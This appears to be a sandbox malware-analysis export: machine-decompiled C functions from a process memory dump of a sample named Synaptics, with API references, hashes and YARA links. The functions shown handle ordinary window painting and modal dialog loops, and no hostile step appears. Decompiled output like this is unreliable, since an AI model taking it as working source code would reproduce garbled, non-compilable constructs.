                                                                                                                                                                                                                            			E004424F8(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t120;
				void* _t171;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr _t205;
				void* _t208;
				intOrPtr _t216;
				signed int _t234;
				void* _t237;
				void* _t239;
				intOrPtr _t240;

				_t237 = _t239;
				_t240 = _t239 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t120 = E00441704(_v8);
					_push(_t120);
					L00407730();
					_v16 = _t120;
					_push(_t237);
					_push(0x44275e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t240;
					GetClientRect(E00441704(_v8),  &_v32);
					GetWindowRect(E00441704(_v8),  &_v48);
					MapWindowPoints(0, E00441704(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t208 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t234 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t208;
						}
						if((_t234 & 0x00200000) != 0) {
							_t196 =  *0x49d970; // 0x49e900
							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t208;
						}
						if((_t234 & 0x00100000) != 0) {
							_t193 =  *0x49d970; // 0x49e900
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x49bcec + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x49bcfc + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x49bd0c + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x49bd1c + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E00425610( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t216);
					 *[fs:eax] = _t216;
					_push(0x442765);
					_push(_v16);
					_t171 = E00441704(_v8);
					_push(_t171);
					L00407888();
					return _t171;
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t205 = E004329D8(E004328F8());
					if(_t205 != 0) {
						_t205 = _v8;
						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
							_t205 = E00432F08(E004328F8(), 0, _v8);
						}
					}
					return _t205;
				}
			}




















                                                                                                                                                                                                                            0x004424f9
                                                                                                                                                                                                                            0x004424fb
                                                                                                                                                                                                                            0x00442501
                                                                                                                                                                                                                            0x00442504
                                                                                                                                                                                                                            0x00442511
                                                                                                                                                                                                                            0x00442526
                                                                                                                                                                                                                            0x0044252b
                                                                                                                                                                                                                            0x0044252c
                                                                                                                                                                                                                            0x00442531
                                                                                                                                                                                                                            0x00442536
                                                                                                                                                                                                                            0x00442537
                                                                                                                                                                                                                            0x0044253c
                                                                                                                                                                                                                            0x0044253f
                                                                                                                                                                                                                            0x0044254f
                                                                                                                                                                                                                            0x00442561
                                                                                                                                                                                                                            0x00442577
                                                                                                                                                                                                                            0x0044258c
                                                                                                                                                                                                                            0x004425a5
                                                                                                                                                                                                                            0x004425b0
                                                                                                                                                                                                                            0x004425b1
                                                                                                                                                                                                                            0x004425b2
                                                                                                                                                                                                                            0x004425b3
                                                                                                                                                                                                                            0x004425c3
                                                                                                                                                                                                                            0x004425ce
                                                                                                                                                                                                                            0x004425cf
                                                                                                                                                                                                                            0x004425d0
                                                                                                                                                                                                                            0x004425d1
                                                                                                                                                                                                                            0x004425dc
                                                                                                                                                                                                                            0x004425e2
                                                                                                                                                                                                                            0x004425ee
                                                                                                                                                                                                                            0x004425f3
                                                                                                                                                                                                                            0x004425f3
                                                                                                                                                                                                                            0x00442603
                                                                                                                                                                                                                            0x00442608
                                                                                                                                                                                                                            0x00442608
                                                                                                                                                                                                                            0x0044261e
                                                                                                                                                                                                                            0x0044262a
                                                                                                                                                                                                                            0x0044262c
                                                                                                                                                                                                                            0x0044262c
                                                                                                                                                                                                                            0x00442639
                                                                                                                                                                                                                            0x0044263b
                                                                                                                                                                                                                            0x0044263b
                                                                                                                                                                                                                            0x00442648
                                                                                                                                                                                                                            0x0044264a
                                                                                                                                                                                                                            0x0044264a
                                                                                                                                                                                                                            0x00442653
                                                                                                                                                                                                                            0x00442657
                                                                                                                                                                                                                            0x00442660
                                                                                                                                                                                                                            0x00442660
                                                                                                                                                                                                                            0x0044266d
                                                                                                                                                                                                                            0x0044266f
                                                                                                                                                                                                                            0x0044266f
                                                                                                                                                                                                                            0x00442678
                                                                                                                                                                                                                            0x0044267c
                                                                                                                                                                                                                            0x00442685
                                                                                                                                                                                                                            0x00442685
                                                                                                                                                                                                                            0x004426e5
                                                                                                                                                                                                                            0x004426e5
                                                                                                                                                                                                                            0x004426fe
                                                                                                                                                                                                                            0x00442709
                                                                                                                                                                                                                            0x0044270a
                                                                                                                                                                                                                            0x0044270b
                                                                                                                                                                                                                            0x0044270c
                                                                                                                                                                                                                            0x0044271d
                                                                                                                                                                                                                            0x00442739
                                                                                                                                                                                                                            0x00442740
                                                                                                                                                                                                                            0x00442743
                                                                                                                                                                                                                            0x00442746
                                                                                                                                                                                                                            0x0044274e
                                                                                                                                                                                                                            0x00442752
                                                                                                                                                                                                                            0x00442757
                                                                                                                                                                                                                            0x00442758
                                                                                                                                                                                                                            0x0044275d
                                                                                                                                                                                                                            0x00442765
                                                                                                                                                                                                                            0x0044276d
                                                                                                                                                                                                                            0x00442775
                                                                                                                                                                                                                            0x0044277c
                                                                                                                                                                                                                            0x0044277e
                                                                                                                                                                                                                            0x00442785
                                                                                                                                                                                                                            0x00442791
                                                                                                                                                                                                                            0x00442791
                                                                                                                                                                                                                            0x00442785
                                                                                                                                                                                                                            0x0044279c
                                                                                                                                                                                                                            0x0044279c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9B080.USER32(00000000), ref: 0044252C
                                                                                                                                                                                                                            • GetClientRect.USER32 ref: 0044254F
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00442561
                                                                                                                                                                                                                            • MapWindowPoints.USER32 ref: 00442577
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0044258C
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 004425A5
                                                                                                                                                                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 004425C3
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00442619
                                                                                                                                                                                                                            • DrawEdge.USER32(?,?,00000000,00000008), ref: 004426E5
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004426FE
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0044271D
                                                                                                                                                                                                                            • FillRect.USER32 ref: 00442739
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,00442765,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00442758
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 156109915-0
                                                                                                                                                                                                                            • Opcode ID: a110ff9a93dfc761bce5d57d5e916418852a8b18f182c9e32c65a8a75eeea78d
                                                                                                                                                                                                                            • Instruction ID: af5f50b217af5c554848a1b825971ec4031c124bbe34cabe8649f27ab7cee0d4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a110ff9a93dfc761bce5d57d5e916418852a8b18f182c9e32c65a8a75eeea78d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48911771E04208AFDB01DBA9C985EEEB7F9AF09314F5440A6F504F7252C779AE40DB64
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00432F08 Relevance: 18.1, APIs: 12, Instructions: 142COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                            			E00432F08(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				signed char _t43;
				struct HDC__* _t55;
				void* _t74;
				signed int _t77;
				int _t78;
				int _t79;
				void* _t92;
				intOrPtr _t105;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t120 = _t122;
				_t123 = _t122 + 0xffffffbc;
				_t92 = __ecx;
				_v8 = __edx;
				_t114 = __eax;
				_t43 = GetWindowLongA(E00441704(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E00441704(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_t55 = E00441704(_v8);
					_push(_t55);
					L00407730();
					_v12 = _t55;
					_push(_t120);
					_push(0x433063);
					_push( *[fs:edx]);
					 *[fs:edx] = _t123;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 = _t114;
					if(_t92 != 0) {
						_t77 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
							_t78 = GetSystemMetrics(2);
							_t79 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E00419804(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t117 = _t117;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00432B40( &_v56, 2);
					E00432A94(_t117,  &_v56, _v12, 0,  &_v44);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x43306a);
					_push(_v12);
					_t74 = E00441704(_v8);
					_push(_t74);
					L00407888();
					return _t74;
				}
			}






















                                                                                                                                                                                                                            0x00432f09
                                                                                                                                                                                                                            0x00432f0b
                                                                                                                                                                                                                            0x00432f11
                                                                                                                                                                                                                            0x00432f13
                                                                                                                                                                                                                            0x00432f16
                                                                                                                                                                                                                            0x00432f23
                                                                                                                                                                                                                            0x00432f2b
                                                                                                                                                                                                                            0x00433070
                                                                                                                                                                                                                            0x00432f31
                                                                                                                                                                                                                            0x00432f3e
                                                                                                                                                                                                                            0x00432f53
                                                                                                                                                                                                                            0x00432f5b
                                                                                                                                                                                                                            0x00432f60
                                                                                                                                                                                                                            0x00432f61
                                                                                                                                                                                                                            0x00432f66
                                                                                                                                                                                                                            0x00432f6b
                                                                                                                                                                                                                            0x00432f6c
                                                                                                                                                                                                                            0x00432f71
                                                                                                                                                                                                                            0x00432f74
                                                                                                                                                                                                                            0x00432f7e
                                                                                                                                                                                                                            0x00432f7f
                                                                                                                                                                                                                            0x00432f80
                                                                                                                                                                                                                            0x00432f81
                                                                                                                                                                                                                            0x00432f82
                                                                                                                                                                                                                            0x00432f85
                                                                                                                                                                                                                            0x00432f92
                                                                                                                                                                                                                            0x00432f9c
                                                                                                                                                                                                                            0x00432fa7
                                                                                                                                                                                                                            0x00432fb0
                                                                                                                                                                                                                            0x00432fbf
                                                                                                                                                                                                                            0x00432fd9
                                                                                                                                                                                                                            0x00432fe5
                                                                                                                                                                                                                            0x00432fe6
                                                                                                                                                                                                                            0x00432fe7
                                                                                                                                                                                                                            0x00432fe8
                                                                                                                                                                                                                            0x00432fe9
                                                                                                                                                                                                                            0x00432ffa
                                                                                                                                                                                                                            0x00432ffa
                                                                                                                                                                                                                            0x00432f9c
                                                                                                                                                                                                                            0x0043301f
                                                                                                                                                                                                                            0x0043302b
                                                                                                                                                                                                                            0x0043303e
                                                                                                                                                                                                                            0x00433045
                                                                                                                                                                                                                            0x00433048
                                                                                                                                                                                                                            0x0043304b
                                                                                                                                                                                                                            0x00433053
                                                                                                                                                                                                                            0x00433057
                                                                                                                                                                                                                            0x0043305c
                                                                                                                                                                                                                            0x0043305d
                                                                                                                                                                                                                            0x00433062
                                                                                                                                                                                                                            0x00433062

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00432F23
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00432F3E
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 00432F53
                                                                                                                                                                                                                            • 73C9B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00432F61
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00432F92
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00432FA7
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00432FB0
                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00432FBF
                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00432FEC
                                                                                                                                                                                                                            • FillRect.USER32 ref: 00432FFA
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043301F
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,0043306A,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043305D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3936689491-0
                                                                                                                                                                                                                            • Opcode ID: 6e3feaa59ff7954d7f1e1212010fcca33713d4ca3cef126796b1d2c495fcecae
                                                                                                                                                                                                                            • Instruction ID: 04c1fd49532e7d442bf35e743343acee4fdea8649fd85b2f3a22c1a56fe95c6f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e3feaa59ff7954d7f1e1212010fcca33713d4ca3cef126796b1d2c495fcecae
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9415E71E04108ABDB01EAE9CD82EDFB7BDEF49364F100126F904F7291CA78AE418765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042CAA8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E0042CAA8(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x49e92f != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x49e91c = E0042C4FC(7, _t60,  *0x49e91c, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                                                                                                                                                                                                            0x0042cab1
                                                                                                                                                                                                                            0x0042cab4
                                                                                                                                                                                                                            0x0042cabe
                                                                                                                                                                                                                            0x0042caee
                                                                                                                                                                                                                            0x0042caf4
                                                                                                                                                                                                                            0x0042cbb0
                                                                                                                                                                                                                            0x0042cbb8
                                                                                                                                                                                                                            0x0042cbb8
                                                                                                                                                                                                                            0x0042cafc
                                                                                                                                                                                                                            0x0042cb01
                                                                                                                                                                                                                            0x0042cb0c
                                                                                                                                                                                                                            0x0042cb17
                                                                                                                                                                                                                            0x0042cb1c
                                                                                                                                                                                                                            0x0042cb85
                                                                                                                                                                                                                            0x0042cb9d
                                                                                                                                                                                                                            0x0042cbae
                                                                                                                                                                                                                            0x0042cb99
                                                                                                                                                                                                                            0x0042cb99
                                                                                                                                                                                                                            0x0042cb99
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042cb85
                                                                                                                                                                                                                            0x0042cb28
                                                                                                                                                                                                                            0x0042cb37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042cb49
                                                                                                                                                                                                                            0x0042cb61
                                                                                                                                                                                                                            0x0042cb77
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042cb7d
                                                                                                                                                                                                                            0x0042cb7f
                                                                                                                                                                                                                            0x0042cb7f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042cb61
                                                                                                                                                                                                                            0x0042cad2
                                                                                                                                                                                                                            0x0042cae7
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042CAE1
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CB06
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042CB11
                                                                                                                                                                                                                            • GetClipBox.GDI32(?,?), ref: 0042CB23
                                                                                                                                                                                                                            • GetDCOrgEx.GDI32(?,?), ref: 0042CB30
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0042CB49
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 0042CB5A
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 0042CB70
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                                                                                                                                                            • String ID: EnumDisplayMonitors
                                                                                                                                                                                                                            • API String ID: 362875416-2491903729
                                                                                                                                                                                                                            • Opcode ID: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                                                                                                                                                                                            • Instruction ID: 4511490224432de624573bc09b14fa9d255139f998f9dfe8687c617b2a51fe57
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 723101B2E04219AFDB50DFA5E885EFF77BCAB05300F444537ED15E3241D638AA018BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00457244 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 144windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                            			E00457244(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t90;
				intOrPtr _t122;
				void* _t124;
				void* _t127;
				void* _t128;
				intOrPtr _t129;

				_t125 = __esi;
				_t124 = __edi;
				_t105 = __ebx;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t127);
				_push(0x45750c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				E004397DC();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x49da70; // 0x422f48
					E00406A70(_t50,  &_v36);
					E0040D144(_v36, 1);
					E00404378();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t56 =  *0x49ebb8; // 0x21e1714
				E004596E4(_t56);
				_push(_t127);
				_push(0x4574ef);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
				_v32 = GetActiveWindow();
				_t60 =  *0x49be70; // 0x0
				_v20 = _t60;
				_t61 =  *0x49ebbc; // 0x21e1320
				_t20 = _t61 + 0x78; // 0x0
				_t62 =  *0x49ebbc; // 0x21e1320
				_t21 = _t62 + 0x7c; // 0x21e1564
				E0041ACE8( *_t21,  *_t20, 0);
				_t65 =  *0x49ebbc; // 0x21e1320
				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
				_t66 =  *0x49ebbc; // 0x21e1320
				_t24 = _t66 + 0x44; // 0x0
				_v22 =  *_t24;
				_t68 =  *0x49ebbc; // 0x21e1320
				E00458714(_t68,  *_t20, 0);
				_t70 =  *0x49ebbc; // 0x21e1320
				_t26 = _t70 + 0x48; // 0x0
				_v28 =  *_t26;
				_v16 = E00451600(0, _t105, _t124, _t125);
				_push(_t127);
				_push(0x4574cd);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				E00457194(_v8);
				_push(_t127);
				_push(0x45742c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				SendMessageA(E00441704(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					_t80 =  *0x49ebb8; // 0x21e1714
					E0045A580(_t80, _t124, _t125);
					_t82 =  *0x49ebb8; // 0x21e1714
					if( *((char*)(_t82 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E004570F4(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t85 == 0);
				_v12 = _t85;
				SendMessageA(E00441704(_v8), 0xb001, 0, 0);
				_t90 = E00441704(_v8);
				if(_t90 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(0x457433);
				return E0045718C();
			}





























                                                                                                                                                                                                                            0x00457244
                                                                                                                                                                                                                            0x00457244
                                                                                                                                                                                                                            0x00457244
                                                                                                                                                                                                                            0x00457245
                                                                                                                                                                                                                            0x00457247
                                                                                                                                                                                                                            0x0045724a
                                                                                                                                                                                                                            0x0045724b
                                                                                                                                                                                                                            0x0045724e
                                                                                                                                                                                                                            0x00457251
                                                                                                                                                                                                                            0x00457256
                                                                                                                                                                                                                            0x00457257
                                                                                                                                                                                                                            0x0045725c
                                                                                                                                                                                                                            0x0045725f
                                                                                                                                                                                                                            0x00457262
                                                                                                                                                                                                                            0x0045726e
                                                                                                                                                                                                                            0x00457297
                                                                                                                                                                                                                            0x0045729c
                                                                                                                                                                                                                            0x004572ab
                                                                                                                                                                                                                            0x004572b0
                                                                                                                                                                                                                            0x004572b0
                                                                                                                                                                                                                            0x004572bc
                                                                                                                                                                                                                            0x004572ca
                                                                                                                                                                                                                            0x004572ca
                                                                                                                                                                                                                            0x004572cf
                                                                                                                                                                                                                            0x004572d4
                                                                                                                                                                                                                            0x004572d9
                                                                                                                                                                                                                            0x004572e0
                                                                                                                                                                                                                            0x004572e1
                                                                                                                                                                                                                            0x004572e6
                                                                                                                                                                                                                            0x004572e9
                                                                                                                                                                                                                            0x004572ef
                                                                                                                                                                                                                            0x004572fb
                                                                                                                                                                                                                            0x004572fe
                                                                                                                                                                                                                            0x00457303
                                                                                                                                                                                                                            0x00457306
                                                                                                                                                                                                                            0x0045730b
                                                                                                                                                                                                                            0x0045730e
                                                                                                                                                                                                                            0x00457313
                                                                                                                                                                                                                            0x00457318
                                                                                                                                                                                                                            0x0045731d
                                                                                                                                                                                                                            0x00457325
                                                                                                                                                                                                                            0x00457328
                                                                                                                                                                                                                            0x0045732d
                                                                                                                                                                                                                            0x00457331
                                                                                                                                                                                                                            0x00457337
                                                                                                                                                                                                                            0x0045733c
                                                                                                                                                                                                                            0x00457341
                                                                                                                                                                                                                            0x00457346
                                                                                                                                                                                                                            0x00457349
                                                                                                                                                                                                                            0x00457353
                                                                                                                                                                                                                            0x00457358
                                                                                                                                                                                                                            0x00457359
                                                                                                                                                                                                                            0x0045735e
                                                                                                                                                                                                                            0x00457361
                                                                                                                                                                                                                            0x00457367
                                                                                                                                                                                                                            0x0045736e
                                                                                                                                                                                                                            0x0045736f
                                                                                                                                                                                                                            0x00457374
                                                                                                                                                                                                                            0x00457377
                                                                                                                                                                                                                            0x0045738c
                                                                                                                                                                                                                            0x00457396
                                                                                                                                                                                                                            0x0045739c
                                                                                                                                                                                                                            0x0045739c
                                                                                                                                                                                                                            0x004573a1
